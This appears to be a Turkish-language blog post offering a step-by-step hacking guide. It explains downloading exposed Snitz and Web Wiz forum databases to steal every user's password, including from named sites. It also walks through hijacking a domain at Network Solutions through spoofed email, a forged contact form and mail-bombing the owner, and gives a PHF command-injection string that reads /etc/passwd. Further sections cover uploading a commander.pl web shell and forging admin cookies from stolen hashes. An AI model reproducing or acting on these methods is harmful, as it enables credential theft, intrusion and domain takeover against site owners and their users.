1-Bu olayı herkez yapabilir çok basit bir yöntem, bu yöntemle geçen haftalarda 400 e yakın üyesi olan bir forum u hackledim. En çok kullanılan 2 forum türü vardır biri Snitz diğeri ise Web Wiz Guide forum larıdır. color=#800080 www.google.com <http://www.google.com> dan bu isimleri aratıyorsunuz orda size yüzlerce forum çıkar (Web Wiz forum olarak aratın) örneğin color=#0000ff www.ahmetyigit.com/forum <http://www.ahmetyigit.com/forum> adresinin google dan buldunuz ve siteye girdiniz eğer Snitz forum ise sonuna şunları ekleyin /snitz_forums_2000.mdb <eğer adam mdb dosyasının yerini değiştirmeden sitesine attıysa bütün kullanıcı isimleri ve şifrelerini görebilirsiniz>daha sonra karşınıza bu dosyayı yüklemek istiyormusunuz diye bişey gelicek kaydet diyin ye dosyayı yükleyin. Daha sonra bilgisayarınızda Microsoft Access varsa bu dosyayı açıp o forum un bütün şifrelerinin ele geçirebilirsiniz. Geçirdiğiniz şifreler arasında admin şifreside bulunmaktadır bu sayede forum un ortasına hacked by .... yaza bilirsiniz. Yanlız bu olay bütün forumlarda olmamaktadır.
1-Google dan Sntiz forum diye arattığınız sitelerin sonuna "/snitz_forums_2000.mdb" yi ekleyin örneğin color=#0000ff www.ahmetyigit.com/forum/snitz_forums_2000.mdb <http://www.ahmetyigit.com/forum/snitz_forums_2000.mdb>
2-Google dan Web Wiz Guide forum diye aratığınız sitelerin sonuna "/admin/wwForum.mdb" yi ekleyin örneğin color=#0000ff www.ahmetyigit.com/forum/admin/wwForum.mdb <http://www.ahmetyigit.com/forum/admin/wwForum.mdb>
alın şimdi bir site bunu hacklemenize gerek yok çünkü bişey yapmamış color=#0000ff <http://www.mursal.com/mursalforum/forum> bunu ekleyin /admin/wwForum.mdb
NOT: Bu BİLİNEN kolay bir hack yöntemidir.
2- Bu teknik Internicin yeterli güvenliği sağlayamaması nedeniyle ortaya çıkıyor. .com .net .org .gov .mil uzantılı domainlerde etkili olunabiliyor. Web sayfası üzerinden bir kaç mail alışverişi sayesinde bir domain adı geçici bir sürede olsa sizin adınıza geçiyor yada kullanılmaz hale geliyor.
Required ingredients:
* Mail adresini saklayıp başka birisinin mailiymiş gibi gösterebileceğiniz bir anonymousmailer yada mailbomber programı..
* Maillerinizle kandırabilme özelliği. Yeterli Ingilizce.
* Herhangi bir Fake mail adresi. (Mail adresini kullanabişliyor olun mutlaka. Free servislerde birinden alın.)
Exploit:
Şimdi örnek olarak biz Example.org adlı adresi alacağız. <http://www.networksolutions.com/> adresine gidin. Who is yazan linke tıklayarak domain adresimizi girelim ve bu domain ile ilgili bilgilere ulaşalım. Aşağıdaki gibi bir tablo çıkacaktır.
Registrant:
Example (ex24-DOM)
Address details
Domain Name: EXAMPLE.ORG
Administrative Contact, Technical Contact, Zone Contact, Billing Contact:
DOMAIN, ADMIN (ADM001) ADMINEMAIL@EXAMPLE.COM <mailto:ADMINEMAIL@EXAMPLE.COM>
Record last updated on 00-Jan-2000.
Record created on 00-Jan-2000.
Database last updated on 3-Feb-2000 14:29:53 EST.
Domain servers in listed order:
NS1.EXAMPLE.COM 1.2.3.4
NS2.EXAMPLE.NET 1.2.3.5
Şimdi İki seçeneğimiz var:
1) Domain in tüm kontrolünü Administrator olarak elimize alır ve değişiklik yapabiliriz.
2) Yada size ait olan bir web sunucusuna geri alınana kadar yönlendirebiliriz.
İlk Saldırı Şekli.
Internic Authentication işlemi için Domain sahibinin gerçekten siz olup olmadığına bakmaz. Değişiklik sonrası Onay (Confirm) mailinin hangi adresten geldiğini kontrol eder. Yani Domain için değişiklik yapınca size bir onay maili gelir. Bu mail Domain sahibinin adresine gelir. Mesela örneğimizde ADMINEMAIL@EXAMPLE.COM <mailto:ADMINEMAIL@EXAMPLE.COM> adresine gelecektir. Yani bizde onay mailini sanki bu adresten geliyormuş gibi göstermeliyizki domain değişikliğimiz kabul edilsin.
Adım adım işlemler.
- Network Solutions adresine gidelim.
- Make Change linkine tıklayın.
- DOmain Name girişini yapın. ( example.org gibi)
- İki mavi buton göreceksiniz
- Expert yazılı olana tıklayın
- Sonraki ekranda 'Select the form that meets your needs' başlıklı bri sayfa gelecek
- Contact Form linkine tıklayın
- İki tane bilgi girişi için text box göreceksiniz.
- Birinci kutucuğa ADMIN yöneticisin girin. (example.org için ADM001)
- İkinci kutucuğa domain sahibinin mail adresini yazın. (example.org için ADMINEMAIL@EXAMPLE.com <mailto:ADMINEMAIL@EXAMPLE.com>)
- Modify seçeneğini seçin.
- Şimdi Proceed to Contact Information penceresi gelecek
- MAIL-FORM seçeneğini seçin ve 'Go on to Contact Data Information' düğmesine basın.
- Şimdi Admin ile ilgili bütün bilgiler karşınıza gelecektir.
- Mail alanına gidin ve sizin Fake mail adresinizi yazın.phyton@hotmail.com
- Şimdi 'Proceed to Set Authorization Scheme' seçeneğini seçin
- Tekrar MAIL-FORM seçip admin mail adresini girin (ADMINDEMAIL@EXAMPLE.COM)
- Alttaki Seçeneği No olarak işaretleyin ve Generate Contact Form seçin
- Şimdi Aşağıdaki Mail Şablonuna bakın.
Versiyon Numarasını Değiştirmeyin
Contact Version Number: 1.0
Detayları web sayfasından alıp yazın
Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:
Contact Information
1a. NIC Handle..............: ADM001
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: DOMAIN, ADMIN
1d. Organization Name.......: EXAMPLE
1e. Street Address..........:
1f. City....................:
1g. State...................:
1h. Postal Code.............:
1i. Country.................:
1j. Phone Number............:
1k. Fax Number..............:
1l. E-Mailbox...............: evil@domain.com <mailto:evil@domain.com>
Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE
Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: ADMINEMAIL@EXAMPLE.COM <mailto:ADMINEMAIL@EXAMPLE.COM>
3c. Public (Y/N)............: NO
NOTE: Aşağıda 'Mail this contact form to me!' yazılı butona basmayın.
Şimdi bu yazıyı kopyalayın ve Anonymous Remalerinize yapıştırın. Şimdi zor kısmına geldik. Siz bu maili yolladığınızda (Adminin mail adresinden spoof yaparak tabiki) ADMIN mailine hostmaster@networksolutions.com <mailto:hostmaster@networksolutions.com> adresinden bir confrim maili gelecektir.
Örnek:
Subject: [NIC-000128.4r50] Your Mail
This is an automatic reply to acknowledge that your message has been received by hostmaster@networksolutions.com <mailto:hostmaster@networksolutions.com>. This acknowledgement is "NOT" a confirmation that your request has been processed. You will be notified when it has been completed.
If you should have need to correspond with us regarding this request, please include the tracking number [NIC-000128.4r50] in the subject. The easiest way to do this is simply to reply to this message.
If you have not already done so, please come and visit our site via www browser or ftp and pick-up the latest domain template or review the Domain Name Registration Service Agreement at the URL's:
Domain Name Registration Service Agreement
http://www.networksolutions.com/leg...-agreement.html <http://www.networksolutions.com/legal/service-agreement.html>
Domain Name Registration Template
ftp://www.networksolutions.com/temp...in-template.txt <ftp://www.networksolutions.com/templates/domain-template.txt>
Regards,
Network Solutions Registration Services
IMPORTANT INFORMATION
On January 15, 2000, Network Solutions introduced Service Agreement, Version 6.0. All versions of the Service Agreement template will continue to be accepted and processed until January 31, 2000. On and after February 1, 2000, please use the Network Solutions Service Agreement, Version 6.0 template located at
ftp://www.networksolutions.com/temp...in-template.txt <ftp://www.networksolutions.com/templates/domain-template.txt>
for all template requests.
The terms and conditions of the Service Agreement are available on our Web site at: http://www.networksolutions.com/leg...-agreement.html <http://www.networksolutions.com/legal/service-agreement.html>.
The zone files, which make the Internet work, are normally updated twice daily, 7 days a week at 5:00 küfür yasak and 5:00 PM U.S. Eastern Standard Time. Requests that are completed before these times will be included in that 12-hour zone file update and will normally begin to take effect within 5-6 hours.
Should you wish to modify or delete an existing domain name registration, you can do so online, using our Service Agreement. You can change the registrant's address, replace a contact/agent with a different contact/agent, or change primary and/or secondary name server information.
To update information about an existing contact, such as postal address, e-mail address or telephone number, complete and submit the Contact Form to hostmaster@internic.net <mailto:hostmaster@internic.net>. This form is available on our Web site at www.networksolutions.com <http://www.networksolutions.com>
To register or update information about a name server, complete and submit the Host Form to hostmaster@internic.net <mailto:hostmaster@internic.net>. This form is also available on our Web site.
Network Solutions Registration Services
e-mail: help@networksolutions.com <mailto:help@networksolutions.com>
Bu mesajı domain sahibi alırsa kolayca fark edecektir olayı. Bu yüzden mail bomberinizle 20-30 tane bu tarz mail yollayın. 35 tane aynı adresten mail geldiğini görünce karşı taraf silecektir. Mail bomberinize Tracking numarasını aynı girmeyin. Mesela [NIC-000128.4r50] şeklinde değişken numaralar kullanın. Mail adresinin Body sindeki numarayı da değiştirmeyi unutmayın. Böylece kurban hangi maile cevap vereceğini bilemeyecek bunun bir saldırı olduğunu düşünecektir. Bunu böyle düşünmesi içinde nuamralamad aşağıdaki sıralamaya benzer bir sıralama kullanın.
[NIC-000127.5089]
[NIC-000128.4rg7]
[NIC-000128.523f]
[NIC-000127.53d0]
[NIC-000129.r609]
[NIC-000128.3f6y]
[NIC-000128.5d8t]
[NIC-000127.r509]
[NIC-000128.4r30]
[NIC-000127.d307]
admin@example.com <mailto:admin@example.com> adresine hostmaster@internic.net <mailto:hostmaster@internic.net> adresinden gelen mailler atın. Mesaj az öcenki ile aynı konu ve gövde de olacak. 10 15 tane mail atın. Şimdi Fake mailimize geldi Remailer ile Adminemail@example.com <mailto:Adminemail@example.com> adresinden geliyormuş gibi göstererek hostmaster@networksolutions.com <mailto:hostmaster@networksolutions.com> adresine aşağıda şablonu olan mailden bir tane yollayın.
Version numarasını değiştirmeyin
Contact Version Number: 1.0
Detayları kendinize göre değiştirin
Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:
Contact Information
1a. NIC Handle..............: ADM001
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: DOMAIN, ADMIN
1d. Organization Name.......: EXAMPLE
1e. Street Address..........:
1f. City....................:
1g. State...................:
1h. Postal Code.............:
1i. Country.................:
1j. Phone Number............:
1k. Fax Number..............:
1l. E-Mailbox...............: evil@domain.com <mailto:evil@domain.com>
Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE
Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: ADMINEMAIL@EXAMPLE.COM <mailto:ADMINEMAIL@EXAMPLE.COM>
3c. Public (Y/N)............: NO
NOTE: Konu kısmını kesinlikle boş bırakın.
Sadece bir tane yollayın hostmaster@networksolutions.com <mailto:hostmaster@networksolutions.com> adresine. Sonra tekrar adminemail@example.com <mailto:adminemail@example.com> adresini mail bombaredımanına tutun. Tracking Nuamrasını değiştirmeyi unutmayın. 35 tane kadar atın mail.
24 Saat içinde admin ayarları değişecek ve yeni admin siz olacaksınız.
3- Şimdi web hacking olayı Hack olayının en akıl isteyen kısmıdır. Şimdiden söylüyorum aranızda bu işlerden anlamayan veya kafası bu tarz işlere basmayanlar varsa bu yazıyı okuyupta vaktini boşa harcamasın. Bu işlerde yeteniği olan kişiler yanlızca web hacking yapabilir. Gerisi avcunu yalar.
Olaya giriyorum. Şimdi en önce olayı mantık ve felsefe sınırlarına oturtalım. Bu benim kendi felsefem. Felsefem ise şu: Bir sistemin nasıl çalıştığını bilmeden, o sistemi kıramazsın! Bunu bir diğer anlamda açıklarsak bir sistemin arkasını görmeden onu önden çökertemezsin.
Peki ne bu? mesela senin bir web siten yok! Ama web hacking yapmak istiyorsun mümkün mü? Hayır değil! Nasıl işlediğini bilmediğin birşeye zarar veremezsin.
Peki yöntemler neler. Herkezin yapacağı basit yöntemler var başta. Mesela Brute Force, Dict Attack falan. Bunları yapmak için nerdeyse web bilmeye bile gerek yok. Sadece FTP bil yeter. Tabii bunlar Lamerlara göre şeyler, biz olayı aştığımız için fazla bilgi isteyen şeyleri yapıcaz. En önce bir sisteme girmek için açık olması gerekli ki açıktan dalalım. Nasıl açıklar olabilir bunlar, mesela bir script açığı PHF gibi. PHF kullanan sitelere şunu yazarsak bize şifrelerin bulunduğu yer gözükür /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd . Ne bu? Açık tabii ki. Çoğu site yama**ştır şimdi ama bu bir açık. Nasıl bulunur? Script yazmayı bilenler bunu bulur. Kaynak koda bakarsın, açık olduğunu işleyiş tarzından anlarsın işte YOL! Burdan şifreleri alırsın bazılar Shadowed falan olur, bazılarını kırmak gerekir falan Cracker Jack tarzı programlarla kırarsın olur biter.
Şimdi bu bir yöntemdi ama başkalarıda var hatta hayal bile edilmemişleri var bu işlerde.
Mesela diğer bir yöntem, Commander.PL. şimdi diyeceksiniz ne bu? Bu commander.pl upload edildiği UNIX makinalara CHMOD 777 ve 755 sayesinde istediğiniz komutu girmenizi sağlayan birşey. Mesela benim hostingimi ****************** sağlıyor ve site adı *********.com. Şimdi bana ayrılan subdomain olan spmaster a ben bunları upload edip çalıştırsam, ftp ile yetkimin olmadığı dosyalara ulaşır istediğimi silerim falan! Anladınız mı? Bakın ne kadar basit! Gidin bunu beleş yer veren yerlere yapın bakalım şimdi.
Diğer bir yöntem derim ama o kadar çokki. Zaten bu yazıyı okuyorsanız ya kendinizi geliştirmek istiyorsunuzdur yada bunu öğrenmek istiyorsunuzdur. Söyliyim şimdiden ikinci seçenektekiler için üzgünüm...
Şimdi benim bulduğum bir yöntem! Bunu açıkla**yacaktım çünkü sonuçta bahsediceğim şahıs benim sitemin bir ziyaretçisi. Ondan çok özür diliyorum bunu anlattığım için ama merak etmesin bu yazıyı okuyanların %99 u sana zarar verebilecek kadar bu işleri iyi bilmiyor. O yüzden sanıyorum sakıncası olmayacaktır.
Şimdi başlıyım, Panick bana jayjay diye bir dostunun olduğunu söyledi, bende baktım bize üye olmuş site kısmındada TYMSAH.COM yazıyor. Merak ettim siteye gittim. Bir baktım ki onlarda bizim formumumuz olan IKONBOARD un aynısını kullanıyor. Neyse baktım tymsah benim türkçeleştirmediği yerleri de türkçeleştirmiş forumun. Bende benim forumdan ve onun forumdan ona PM attım ve bu dosyaları istedim. Bana vereceğini söyledi, aradan vakit geçti dosyaları alamadım çünkü tymsah sanıyorum ki evinde değilmiş şehir dışındaymış.
Bende baktım olmuyor bekle bekle, Allah'a şükür bu işlerden anladığım için hemen yapmam gerekeni yaptım ve onun bana yollayacağı dosyaları kendim aldın nasıl mı?
Ben ikonboard'un dil dosyalarını falan nereye kurduğunu biliyorum. Yani tüm klasörlerin nerede ve hangi isimle olduğunu biliyorum. Çünkü bende ikonboard kullanıyorum. Bende madem öyle dedim, ve forumun dil dosyalarını indirmeye başladım yaptığım şu idi. Mesela hata mesajlarını bulunduran dil dosyasını istiyorsam http://www.tymsah.com/cgi-bin/ikon3...n/ErrorWords.pm <http://www.tymsah.com/cgi-bin/ikon3/Languages/en/ErrorWords.pm> yazmam yeterli. Dan diye ben bu dosyayı download edebiliyorum.
İşte ben böylece tüm dosyaları download ettim ve gördüm ki onun forum ile benim forum farklı versiyon olduğundan dosyalar uyuşmuyor
Herneyse ben istediğimi aldım ama iyi bir insan olarak. Peki diyelim ki ben kötü biriyim ve neler yaparım. İlk yapıcağım iş forumun DATABASE dosyasını ele geçirmek olacaktır. Bu sayede ben tüm forumdaki kullanıcılara şifrelere ve maillere ulaşabilirim. Bu kadar basit! Ha bu şifereler ENCRYPT edilmiş olacağından siz okuyamazsınız bunları. Bunu DECRYPT etmeniz gerekir. Tabii ben okurum bunları. Olay basit aklını kullanacaksın.
Kendi bilgisayarımdaki COOKİE dosyasını açarım, Forum adminin ID sini ve ENCRYPT edilmiş şifresini o databaseden alırım ve kendi COOKİE dosyama koyarım. Forumun sayfasına girince bir bakarım ki ADMİN olarak forumdayım Daha sonra admin şifresini değiştiririm. Sonrada sitenin tama**nı hack ederim. Bu da basit en önce aldığım şifre ile FTP de bir deneme yaparım. Baktım olmuyor, bu forumların File Managerları var, isteyin dosyayı Admin odasından siliyorsun değişitriyosun falan. Ona girerim ve gerisini siz düşünün artık. Bu iş bu kadar kolay!
Hiç yorum yok:
Yorum Gönder